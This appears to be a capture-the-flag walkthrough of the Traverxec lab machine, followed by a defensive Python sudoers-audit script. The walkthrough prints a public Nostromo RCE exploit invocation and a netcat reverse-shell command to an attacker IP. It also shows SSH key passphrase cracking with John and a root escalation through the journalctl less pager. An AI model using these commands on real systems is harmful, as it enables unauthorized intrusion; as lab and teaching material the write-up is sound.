Again, we start with nmap -sC -sV -Pn -p- -oA ./Traverxec 10.10.10.165
We've got HTTP and SSH on their standard ports, and we know that HTTP is running Nostromo 1.9.6. There's nothing special on the page itself and Gobuster shows us nothing interesting. Searchsploit for Nostromo 1.9.6 gives us a quick RCE route to take. Let's start there.
Let's grab that python exploit, run it and see what happens.
python 47837.py 10.10.10.165 80 whoami
Awesome. The RCE works. Now let's turn that into a shell by making the command a netcat callback. Use the standard nc -lvnp 4444 on your machine and run the exploit as:
python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.7 4444"
and we have a www-data shell. Checking the home directory, we see a "david" folder, but no dice listing the contents. Looking around, we do see that nostromo is running in /var/nostromo and the configs are in /var/nostromo/conf. (Completely unrelated, but is anyone else getting an "Aliens" vibe here? I mean "THE Nostromo" C'mon! I can't be the only one) Anyways. Checking out the /var/nostromo/conf/nhttpd.conf file and the .htpasswd file gives us some interesting information.
www-data@traverxec:/var/nostromo/conf$ cat ./.htpasswd
# HOMEDIRS [OPTIONAL]
Changing back into david's home folder, I try to list the public_www folder and actually get a result: a protected-file-area directory, which holds a backup of SSH identity files. Time to see if I can snag that file.
$ scp ./public_www/protected-file-area/backup-ssh-identity-files.tgz email@example.com:/home/kali/Desktop/Traverxec/sshbackups.tgz
Now, I use tar -xvf to extract the files.
tar -xvf sshbackups.tgz
We get these files.
SSH as David time. Aaaaannnnddd ROADBLOCK. Of course the RSA key has a passphrase. No big deal. I can kick that into John and hopefully crack it with rockyou.txt.
kali@kali:~/Desktop/Traverxec/home/david/.ssh$ python3 /usr/share/john/ssh2john.py id_rsa > ../../../hash.txt
In case you're wondering, I went back a few dirs so that all my Traverxec files are in the same place. Personal preference, but you do you. We run it through ssh2john and then john, and the passphrase is <insert requisite drumroll> "hunter".
So, let's try SSH again now that we know the passphrase. No surprise, but it is successful and we actually have a "save point" if you will. Grab the user flag while you're here and let's start enumerating to root. The LinEnum output is in the CTB file as always. In David's home folder is a bin folder with a server-stats.sh script:
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
I believe I should be able to modify that final line that runs journalctl as sudo by exploiting the less pager command and a GTFOBin. If I run the last line prior to the |, it should invoke the "less" command, at which point I can expand the window and then !/bin/bash and grab a root shell. Let's test that out.
Amazingly, that worked! Another box down.
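The root step works because a sudo rule lets david run journalctl, and journalctl hands its output to less whenever stdout is a terminal; the pipe to cat in server-stats.sh only protects the script, not the rule itself. The check below is added example code, not the author's or the box's: it parses a constructed sudoers fragment (the david rule is assumed from the sudo call in the script) and flags command specs for pager-spawning binaries that are not pinned with --no-pager.

```python
"""Audit sudoers command specs for binaries that drop into an interactive pager."""
import re
import shlex

# Binaries that open a pager (or editor) when run on a terminal. A rule that
# lets a user run one of these as root deserves review.
PAGER_SPAWNING = {"journalctl", "systemctl", "less", "more", "man", "vi", "vim"}
# Flags that keep the command non-interactive; only these tools support one.
SAFE_FLAGS = {"journalctl": "--no-pager", "systemctl": "--no-pager"}

# user  hosts = (runas) [TAG:] cmd [, cmd ...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(\((?P<runas>[^)]*)\))?\s*(?P<spec>.*)$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|SETENV):\s*")

# Constructed sudoers content for the demo (not copied from the box).
SUDOERS = """\
Defaults env_reset
root  ALL=(ALL:ALL) ALL
# assumed rule behind the sudo call in server-stats.sh
david ALL=(ALL) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
ops   ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -u nginx, /usr/bin/systemctl status nginx
"""

def parse_rules(text):
    """Yield (user, tags, argv) for every command spec in a sudoers file."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
        if not m:
            continue
        spec, tags = m.group("spec"), set()
        while (t := TAG_RE.match(spec)):
            tags.add(t.group(1))
            spec = spec[t.end():]
        for cmd in spec.split(","):
            argv = shlex.split(cmd.strip())
            if argv:
                rules.append((m.group("user"), tags, argv))
    return rules

def find_pager_risks(text):
    """Return rules whose command can spawn a pager and lacks its safe flag."""
    findings = []
    for user, tags, argv in parse_rules(text):
        name = argv[0].rsplit("/", 1)[-1]
        if argv[0] == "ALL" or name not in PAGER_SPAWNING:
            continue
        if SAFE_FLAGS.get(name) in argv[1:]:
            continue  # pinned non-interactive, e.g. journalctl --no-pager
        fix = f"add {SAFE_FLAGS[name]} to the rule" if name in SAFE_FLAGS else "remove or restrict the rule"
        findings.append({"user": user, "command": " ".join(argv),
                         "nopasswd": "NOPASSWD" in tags, "fix": fix})
    return findings
```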